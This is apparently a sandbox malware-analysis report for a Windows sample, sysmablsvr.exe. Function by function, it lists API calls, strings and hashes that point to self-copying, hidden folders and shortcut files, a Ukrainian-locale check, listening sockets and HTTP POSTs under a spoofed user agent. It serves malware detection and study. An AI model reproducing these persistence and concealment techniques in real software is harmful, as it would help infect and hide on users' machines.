                                                • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 0040B790: EnterCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7A0
                                                • Part of subcall function 0040B790: LeaveCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7CC
                                              • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DB0D
                                              • WaitForSingleObject.KERNEL32(00000608,00001388), ref: 0040DB57
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                              • String ID:
                                              • API String ID: 3920643007-0
                                              • Opcode ID: b555294288812e662926245c1619bb05553a75d869341bdbd32587f084eee9a0
                                              • Instruction ID: 039b22cfc999328ab4dd85ecb07c912dee675a849c6b051bf2d5b72f10c66e02
                                              • Opcode Fuzzy Hash: b555294288812e662926245c1619bb05553a75d869341bdbd32587f084eee9a0
                                              • Instruction Fuzzy Hash: BF11C8B4E00208ABE704EBD4DC46FAF7775EB44700F10857AF601772D1E675AA40CB98
                                              Function 0040B360 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • gethostname.WS2_32(?,00000100), ref: 0040B37C
                                              • gethostbyname.WS2_32(?), ref: 0040B38E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynamegethostname
                                              • String ID:
                                              • API String ID: 3961807697-0
                                              • Opcode ID: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                              • Instruction ID: 44deb7cf52290b4586819f8899dd9153b2a8efa645923fb411959763281ab54e
                                              • Opcode Fuzzy Hash: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                              • Instruction Fuzzy Hash: 63113034908158CBCB24CF14C844BD9B771EB65314F2482DAD89967390C7F9ADC1CF89
                                              Function 0040AFD0 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynameinet_addr
                                              • String ID:
                                              • API String ID: 1594361348-0
                                              • Opcode ID: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                              • Instruction ID: c30d1111fa8aec0d0243eb44b2ea1b203e3c6e8c9f62e428f3e96346a60b5274
                                              • Opcode Fuzzy Hash: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                              • Instruction Fuzzy Hash: B2F01C38900608EFCB00DFB8D44889DBBB4EB48315F2083AAE915673A0D7319E80DB84
                                              Function 0040B9B0 Relevance: 3.0, APIs: 2, Instructions: 16synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(00000608,000003E8), ref: 0040B9BE
                                              • InterlockedDecrement.KERNEL32(00416900), ref: 0040B9D0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DecrementInterlockedObjectSingleWait
                                              • String ID:
                                              • API String ID: 4086267124-0
                                              • Opcode ID: 1e970852be599c696d547c929423b331989f4975ea251fc7d2b6c9e08e4946df
                                              • Instruction ID: a233c83ca34354034971c23090ee6659476326473442f5acee26e7234e36c9e2
                                              • Opcode Fuzzy Hash: 1e970852be599c696d547c929423b331989f4975ea251fc7d2b6c9e08e4946df
                                              • Instruction Fuzzy Hash: B3D0A7B060820897D6006BA2BC4AFAF361DF710700F208037F211F12C1DBBCC88087AD
                                              Function 0040B0D0 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                              Download Yara Rule
                                              APIs
                                              • shutdown.WS2_32(0040B0BD,00000002), ref: 0040B0D9
                                              • closesocket.WS2_32(0040B0BD), ref: 0040B0E3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: closesocketshutdown
                                              • String ID:
                                              • API String ID: 572888783-0
                                              • Opcode ID: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                              • Instruction ID: 69ce69260fc8840876d91afc79957fad69f2a54b7a8d7d483856da217b0a501e
                                              • Opcode Fuzzy Hash: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                              • Instruction Fuzzy Hash: 04C04C7914120CBBCB049FE5ED4DDD97B6CEB4C651F008494FA098B251CBB6E980CB95
                                              Function 0040B790 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7A0
                                              • LeaveCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7CC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: ebaff0e38dce2bcdecab070fba5d988b16e224b8acbc950c5cf15e01cb1945e0
                                              • Instruction ID: 82a24cfc49daa4dd113d85e03683bf8b847197676c2f08b7574fbd4a9c2e3740
                                              • Opcode Fuzzy Hash: ebaff0e38dce2bcdecab070fba5d988b16e224b8acbc950c5cf15e01cb1945e0
                                              • Instruction Fuzzy Hash: 9AE01AB4988248EBC704DB84EC4AB9A77B4E704304F2040A9F40953394DBB96E81CA5D
                                              Function 0040B0F0 Relevance: 2.5, APIs: 2, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00417F40,?,0040B987), ref: 0040B0F8
                                              • LeaveCriticalSection.KERNEL32(00417F40,?,0040B987), ref: 0040B108
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 16df506433d4e8c83b69bad2d7f7829224e80cd3d713427d489287ebbef4d618
                                              • Instruction ID: 2ed2b46888fb6f3b201c7a13b640640739f036443c4b3c2ece1b6af5f7013754
                                              • Opcode Fuzzy Hash: 16df506433d4e8c83b69bad2d7f7829224e80cd3d713427d489287ebbef4d618
                                              • Instruction Fuzzy Hash: F9B092301C8218B7810077A2EC0FECA3A28E954B55B1054F2F04A501AA8FEF24D145AE
                                              Function 0040D220 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • send.WS2_32(00000000,00000000,?,00000000), ref: 0040D23F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: cda5f312f6eda810f0f95d257092257d7ce247fca3496cef4d7c6d61fe650e3b
                                              • Instruction ID: b933cb730c7ceaad0b52d00299a3dfb9d1991716126677b818ce35410280706b
                                              • Opcode Fuzzy Hash: cda5f312f6eda810f0f95d257092257d7ce247fca3496cef4d7c6d61fe650e3b
                                              • Instruction Fuzzy Hash: 7901197490834DEFCB00CFA8C884B9E7BB4BB09314F1081A9E815A7381C3759699CB55
                                              Function 0040D440 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040B790: EnterCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7A0
                                                • Part of subcall function 0040B790: LeaveCriticalSection.KERNEL32(00417F40,?,?,0040D449), ref: 0040B7CC
                                              • WaitForSingleObject.KERNEL32(00000608,00001388), ref: 0040D46C
                                                • Part of subcall function 0040D060: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D06C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                              • String ID:
                                              • API String ID: 3309573332-0
                                              • Opcode ID: b712a9e22ef945fa05c7c249d3f1ce022d4de63074206965558eacae03614f8f
                                              • Instruction ID: a2076b206fb369904fcfb2d1b6828b0d7e28f4f1bfe29f0599cec3c384bc1ad4
                                              • Opcode Fuzzy Hash: b712a9e22ef945fa05c7c249d3f1ce022d4de63074206965558eacae03614f8f
                                              • Instruction Fuzzy Hash: F4E09270E0020CA6D714A7E19C06B6E726A9750305F24847EF501772C1DA79A94487AD
                                              Function 00407250 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID:
                                              • API String ID: 542301482-0
                                              • Opcode ID: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                              • Instruction ID: d63025b72d2c6ebaad53fa266f334e56fbfbf26be99018a77b0022b5cf711e38
                                              • Opcode Fuzzy Hash: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                              • Instruction Fuzzy Hash: 5FE0C97490120CBFDB40DF90C889B9EBBB8AB08315F1081A9E90467280D7B96A948BA5
                                              Function 00406260 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004062C0: GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DriveTypelstrcpy
                                              • String ID:
                                              • API String ID: 3664088370-0
                                              • Opcode ID: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
                                              • Instruction ID: a3f39d1a22dcf836f44b0fbcddd46cfc88cbb50e51ff9e9dfde0dd7881e74902
                                              • Opcode Fuzzy Hash: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
                                              • Instruction Fuzzy Hash: DCF04975D00208EBCB00EFA4D44579EB7B4EF04304F00C0ADE815AB240E639AB58CB49

                                              Non-executed Functions

                                              Function 00406650 Relevance: 79.0, APIs: 34, Strings: 11, Instructions: 300fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                              • wsprintfW.USER32 ref: 0040668F
                                              • wsprintfW.USER32 ref: 004066AF
                                              • wsprintfW.USER32 ref: 004066CF
                                              • wsprintfW.USER32 ref: 004066EF
                                              • wsprintfW.USER32 ref: 00406708
                                              • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                              • DeleteFileW.KERNEL32(?), ref: 0040675E
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                              • DeleteFileW.KERNEL32(?), ref: 00406792
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                              • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                              • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                              • CopyFileW.KERNEL32(C:\Windows\sysmablsvr.exe,?,00000000), ref: 004067EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDrvConfig.exe$%s\*$C:\Windows\sysmablsvr.exe$shell32.dll$shell32.dll
                                              • API String ID: 2120662298-1321675690
                                              • Opcode ID: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction ID: c06ff6b6fb177b83c5a42a6bb152b383d4bd735e421ae8a12f9cadfa06fd6cc4
                                              • Opcode Fuzzy Hash: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction Fuzzy Hash: A8D164B5900258ABCB20DF50DC54FEA77B8BB48304F04C5EAF20AA6191D7B99BD4CF59
                                              Function 00406510 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                              • wsprintfW.USER32 ref: 00406535
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                              • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406571
                                              • lstrcmpW.KERNEL32(?,00410FCC), ref: 00406587
                                              • wsprintfW.USER32 ref: 004065AA
                                              • wsprintfW.USER32 ref: 004065CA
                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                              • FindClose.KERNEL32(000000FF), ref: 0040662F
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 92872011-445461498
                                              • Opcode ID: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction ID: 29a521c4e1aad10613397e171bad1bd73fe874f8ff332ca0de340875b50b0acb
                                              • Opcode Fuzzy Hash: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction Fuzzy Hash: 56315BB5500218AFCB10DB60EC85FDA7778AB48701F40C5A9F609A3185DBB5DAD9CF68
                                              Function 0040ECC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040ECD3
                                              • strcmp.NTDLL ref: 0040ECE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocalestrcmp
                                              • String ID: UKR
                                              • API String ID: 3191669094-64918367
                                              • Opcode ID: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction ID: 77034b4ee665358b2559d06917653f26683f777e377fe2659d333d0cc479d80c
                                              • Opcode Fuzzy Hash: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction Fuzzy Hash: 19E02B32E4830876FA10BAA5AC03FEA375C9711701F000176FF05F21C1F6BA922A979B
                                              Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040192C
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                              • GetTickCount.KERNEL32 ref: 004019F6
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                              • GetTickCount.KERNEL32 ref: 00401A43
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                              • String ID: PCOI$ilci
                                              • API String ID: 3345448188-3762367603
                                              • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction ID: 052bb906b72d623838b809fd2f084fe798b134d15a2779f83897d066d1444b79
                                              • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction Fuzzy Hash: 3441F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99
                                              Function 0040EA80 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.NTDLL ref: 0040EAA8
                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EAF8
                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EB0B
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EB44
                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EB7A
                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EBA5
                                              • HttpSendRequestA.WININET(00000000,004120C8,000000FF,00009E34), ref: 0040EBCF
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EC0E
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040EC60
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC91
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC9E
                                              • InternetCloseHandle.WININET(00000000), ref: 0040ECAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                              • API String ID: 2761394606-2217117414
                                              • Opcode ID: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction ID: c905a0693736bdbf34c7f8e0e7db626079e62ceb693e66bb4324beed71749724
                                              • Opcode Fuzzy Hash: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction Fuzzy Hash: 33514CB5901228ABDB26CF54CC94BDDB7BCAB48705F0481E9B60DA6280C7B96FC4CF54
                                              Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
